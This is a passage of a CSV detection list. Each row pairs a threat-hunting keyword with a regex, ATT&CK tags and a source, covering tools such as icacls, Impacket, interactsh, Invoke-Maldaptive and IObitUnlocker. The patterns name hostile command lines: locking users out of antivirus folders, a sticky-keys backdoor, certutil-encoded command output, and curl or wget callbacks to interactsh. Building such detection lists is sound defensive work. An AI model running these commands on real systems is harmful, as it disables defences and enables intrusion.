Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\Panda Security* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Panda\sSecurity.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\SpyHunter* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\SpyHunter.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV 
name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\SpyHunter* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\SpyHunter.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls c:\windows\system32\sethc.exe *",".{0,1000}icacls\sc\:\\windows\\system32\\sethc\.exe\s.{0,1000}","greyware_tool_keyword","icalcs","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*icacls.exe C:\Windows\System32\amsi.dll /grant administrators:F*",".{0,1000}icacls\.exe\sC\:\\Windows\\System32\\amsi\.dll\s\/grant\sadministrators\:F.{0,1000}","greyware_tool_keyword","icalcs","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*ifconfig * hw ether *",".{0,1000}ifconfig\s.{0,1000}\shw\sether\s.{0,1000}","greyware_tool_keyword","ifconfig","change mac address with ifconfig","T1027","TA0002","N/A","N/A","Defense Evasion","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*ifconfig * hw 
ether *:*:*",".{0,1000}ifconfig\s.{0,1000}\shw\sether\s.{0,1000}\:.{0,1000}\:.{0,1000}","greyware_tool_keyword","ifconfig","changing mac address with ifconfig","T1497.001 - T1036.004 - T1059.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*cmd.exe /Q /c dir 1> * 2>&1 && certutil -encodehex *",".{0,1000}cmd\.exe\s\/Q\s\/c\sdir\s1\>\s.{0,1000}\s2\>\&1\s\&\&\scertutil\s\-encodehex\s.{0,1000}","greyware_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","subject to false positive (not only impacket)","10","10","13227","3529","2024-08-29T14:58:22Z","2015-04-15T14:04:07Z" "*cmd.exe /Q /c hostname 1> * 2>&1 && certutil -encodehex *",".{0,1000}cmd\.exe\s\/Q\s\/c\shostname\s1\>\s.{0,1000}\s2\>\&1\s\&\&\scertutil\s\-encodehex\s.{0,1000}","greyware_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","subject to false positive (not only impacket)","10","10","13227","3529","2024-08-29T14:58:22Z","2015-04-15T14:04:07Z" "*cmd.exe /Q /c hostname 1> * 2>&1 && certutil -encodehex *",".{0,1000}cmd\.exe\s\/Q\s\/c\shostname\s1\>\s.{0,1000}\s2\>\&1\s\&\&\scertutil\s\-encodehex\s.{0,1000}","greyware_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","subject to false positive (not only impacket)","10","10","13227","3529","2024-08-29T14:58:22Z","2015-04-15T14:04:07Z" "*cmd.exe /Q /c ipconfig 1> * 2>&1 && certutil -encodehex * ",".{0,1000}cmd\.exe\s\/Q\s\/c\sipconfig\s1\>\s.{0,1000}\s2\>\&1\s\&\&\scertutil\s\-encodehex\s.{0,1000}\s\s\s\s\s","greyware_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","subject to false positive (not only impacket)","10","10","13227","3529","2024-08-29T14:58:22Z","2015-04-15T14:04:07Z" "*cmd.exe /Q /c ipconfig 1> \Windows\Temp\* 2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\sipconfig\s1\>\s\\Windows\\Temp\\.{0,1000}\s2\>\&1.{0,1000}","greyware_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","subject to false positive (not only impacket)","10","10","13227","3529","2024-08-29T14:58:22Z","2015-04-15T14:04:07Z" "*ookhnhpkphagefgdiemllfajmkdkcaim*",".{0,1000}ookhnhpkphagefgdiemllfajmkdkcaim.{0,1000}","greyware_tool_keyword","iNinja VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*.exec*.interact.sh*",".{0,1000}\.exec.{0,1000}\.interact\.sh.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z" "*.interactsh.com",".{0,1000}\.interactsh\.com","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z" "*/interactsh/*",".{0,1000}\/interactsh\/.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z" "*/interactsh-client*",".{0,1000}\/interactsh\-client.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z" "*/interactsh-collaborator*",".{0,1000}\/interactsh\-collaborator.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z" "*/interactsh-server*",".{0,1000}\/interactsh\-server.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z" "*curl*.interact.sh*",".{0,1000}curl.{0,1000}\.interact\.sh.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z" "*http://*.interact.sh*",".{0,1000}http\:\/\/.{0,1000}\.interact\.sh.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z" "*interactsh -*",".{0,1000}interactsh\s\-.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z" "*interactsh*.exe",".{0,1000}interactsh.{0,1000}\.exe","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z" "*interactsh*oast.*",".{0,1000}interactsh.{0,1000}oast\..{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z" "*interactsh-client -*",".{0,1000}interactsh\-client\s\-.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z" "*interactsh-server -*",".{0,1000}interactsh\-server\s\-.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z" "*projectdiscovery/interactsh*",".{0,1000}projectdiscovery\/interactsh.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z" "*wget*.interact.sh*",".{0,1000}wget.{0,1000}\.interact\.sh.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z" "*/Invoke-Maldaptive.git*",".{0,1000}\/Invoke\-Maldaptive\.git.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","1","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*\Invoke-Maldaptive-main*",".{0,1000}\\Invoke\-Maldaptive\-main.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*\Obfuscated_Command.txt*",".{0,1000}\\Obfuscated_Command\.txt.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - 
TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*275de3390b20723991268204fb3f70b0ec76dba29f809ac0152588cecc22e87f*",".{0,1000}275de3390b20723991268204fb3f70b0ec76dba29f809ac0152588cecc22e87f.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","#filehash","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*50c178847f0454a84f85bc765699c1180ea1b49f91e7d70b5b9113845d008387*",".{0,1000}50c178847f0454a84f85bc765699c1180ea1b49f91e7d70b5b9113845d008387.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","#filehash","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*7215255a842142ffa7f7e1624942684279e9a2f14fa7947451a3194d0b608f52*",".{0,1000}7215255a842142ffa7f7e1624942684279e9a2f14fa7947451a3194d0b608f52.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","#filehash","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*db015ab1-abcd-1234-5678-133337c0ffee*",".{0,1000}db015ab1\-abcd\-1234\-5678\-133337c0ffee.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - 
TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","#GUIDproject","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*Disable-LdapClientWinEvent -ProcessName *",".{0,1000}Disable\-LdapClientWinEvent\s\-ProcessName\s.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*e8f71ea9428bb466651b9cd3a2ed3a726d1a07712bd611330def1ebfcbc68b47*",".{0,1000}e8f71ea9428bb466651b9cd3a2ed3a726d1a07712bd611330def1ebfcbc68b47.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","#filehash","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*https://github.com/mandiant/SilkETW/releases/download/v0.8/SilkETW_SilkService_v8.zip*",".{0,1000}https\:\/\/github\.com\/mandiant\/SilkETW\/releases\/download\/v0\.8\/SilkETW_SilkService_v8\.zip.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","1","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*Invoke-LdapBranchVisitor*",".{0,1000}Invoke\-LdapBranchVisitor.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - 
TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*Invoke-LdapQuery -*ConvertFrom-LdapSearchResult*",".{0,1000}Invoke\-LdapQuery\s\-.{0,1000}ConvertFrom\-LdapSearchResult.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*Invoke-Maldaptive*",".{0,1000}Invoke\-Maldaptive.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","1","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*MaLDAPtive is a framework for LDAP SearchFilter parsing, obfuscation, deobfuscation and detection*",".{0,1000}MaLDAPtive\sis\sa\sframework\sfor\sLDAP\sSearchFilter\sparsing,\sobfuscation,\sdeobfuscation\sand\sdetection.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*Maldaptive.pd1*",".{0,1000}Maldaptive\.pd1.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","1","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" 
"*Maldaptive.psm1*",".{0,1000}Maldaptive\.psm1.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","1","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*MaLDAPtive/Invoke-Maldaptive*",".{0,1000}MaLDAPtive\/Invoke\-Maldaptive.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","1","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*New-ObfuscationContainer -SearchFilter $SearchFilter -SearchRoot:$SearchRoot -AttributeList*",".{0,1000}New\-ObfuscationContainer\s\-SearchFilter\s\$SearchFilter\s\-SearchRoot\:\$SearchRoot\s\-AttributeList.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "*serviceName = 'SilkService*",".{0,1000}serviceName\s\=\s\'SilkService.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z" "* IObitUnlocker.exe*",".{0,1000}\sIObitUnlocker\.exe.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense 
Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*/IObitUnlocker.exe*",".{0,1000}\/IObitUnlocker\.exe.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","1","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*/unlocker-setup.exe*",".{0,1000}\/unlocker\-setup\.exe.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","1","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\*\IObitUnlockerSetup*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\IObitUnlockerSetup.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*\Application Data\IObit\IObit Unlocker*",".{0,1000}\\Application\sData\\IObit\\IObit\sUnlocker.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*\Downloads\IObitUnlockerSetup*",".{0,1000}\\Downloads\\IObitUnlockerSetup.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin 
tool","5","9","N/A","N/A","N/A","N/A" "*\IObit Unlocker.lnk*",".{0,1000}\\IObit\sUnlocker\.lnk.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*\IObitUnlocker.dll*",".{0,1000}\\IObitUnlocker\.dll.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*\IObitUnlocker.exe*",".{0,1000}\\IObitUnlocker\.exe.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin tool","5","9","N/A","N/A","N/A","N/A" "*\IObitUnlocker.ini*",".{0,1000}\\IObitUnlocker\.ini.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimately - admin 